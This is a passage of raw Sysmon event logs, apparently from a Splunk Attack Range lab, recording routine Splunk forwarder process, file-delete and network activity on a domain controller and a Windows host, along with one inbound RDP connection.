Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B0241E9E32CC1C12355BB4D8E3A686F,SHA256=3D6566B13A5EF3903C8A2EAB1BCC5049382DC2E2C93706BA2B281A6BB9D33C47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809313Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:52.348{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=233D9037086DBD61A8CD89DC07FCECF5,SHA256=4D7463DDBFEC78E6AA69C3F6975800CF2B001152E74F7CA8DA565205E35E340E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001052486Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.501{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA84AB504AB2019ED84BF904FA704C19,SHA256=A47FB4B0B475CCF21F8FD45D751D4DDCE4938A6CBF699AEA6498EB6F8A338968,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052485Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.485{466BC892-F6F0-60EB-B17D-00000000CF01}26606296C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052484Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.201{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6F0-60EB-B17D-00000000CF01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052483Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052482Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:52.185{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052481Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052480Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:52.185{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052479Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6F0-60EB-B17D-00000000CF01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052478Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.185{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6F0-60EB-B17D-00000000CF01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program 
Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052477Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:52.180{466BC892-F6F0-60EB-B17D-00000000CF01}2660C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000809312Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:52.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3869E49FAEE5370C2CA63D6F87E03CD5,SHA256=EF55E064A968C5F3AE9F628F27A0DA05F5ACD60196B1CE9B1A4CC7E23D911D6B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809311Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 
08:01:52.317{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3943555B50D3DEEDF48BE269530AE6FC,SHA256=1B0DF9BB4386E7C482372406560493B4A19856F46634374068E4519336D21BDD,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000809310Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:50.861{0C1E0330-0490-60E8-0F00-00000000D001}944C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEtcpfalsefalse181.214.206.155-1456-false10.0.1.15win-host-623.attackrange.local3389ms-wbt-server 23542300x80000000000000001052507Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.868{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=3C36EDEC68C00693CE59F7FD29BE69E5,SHA256=EC9FEC28645A5E5FCA0CA819F8C3F0F7A05A2A0427D62A01BC95426C6C2C2F08,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052506Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.865{466BC892-F6F1-60EB-B37D-00000000CF01}56049436C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x80000000000000001052505Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.688{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4CED47071040FF4E6A37B7CEB41C7D7,SHA256=DC39409505E697E0159EA85354860F01D727F2D9CFB09FC773A5C36B7CBF047E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809315Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:53.364{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=038652CB3964751B0737B4FA21D44542,SHA256=C47D066258591EC05AB3A02AC6A2BB4511659C6303784168EA6544BD9393CCF4,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052504Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.547{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6F1-60EB-B37D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052503Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:53.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052502Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.547{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052501Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:53.531{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052500Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.531{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052499Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.531{466BC892-02AD-60E8-0500-00000000CF01}408524C:\Windows\system32\csrss.exe{466BC892-F6F1-60EB-B37D-00000000CF01}5604C:\Program 
Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001052498Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.531{466BC892-02BC-60E8-2A00-00000000CF01}29283252C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{466BC892-F6F1-60EB-B37D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001052497Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:53.532{466BC892-F6F1-60EB-B37D-00000000CF01}5604C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT 
AUTHORITY\SYSTEM{466BC892-02AD-60E8-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{466BC892-02BC-60E8-2A00-00000000CF01}2928C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000809314Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:51.371{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57387-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 354300x80000000000000001052517Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:46.597{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51164-false10.0.1.12-8000- 23542300x80000000000000001052516Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.708{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=71E1E33F62EE7CFB11A79A1115488CF4,SHA256=4FD77B4DB2276731CF3A0C15CCD9BD871A2966057FEEDCDAB5E1085AF60BCB14,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000809317Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 08:01:54.379{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CA52889D67CF24AC90DBB05295F3325B,SHA256=C5CFB7E3CEC8E223BD741DF959FA3997CB0B10A0605A942B31DA8F4E4749304F,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001052515Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F6F2-60EB-B47D-00000000CF01}4452C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052514Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 08:01:54.231{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052513Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 
08:01:54.231{466BC892-02AF-60E8-0C00-00000000CF01}8448956C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001052512Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 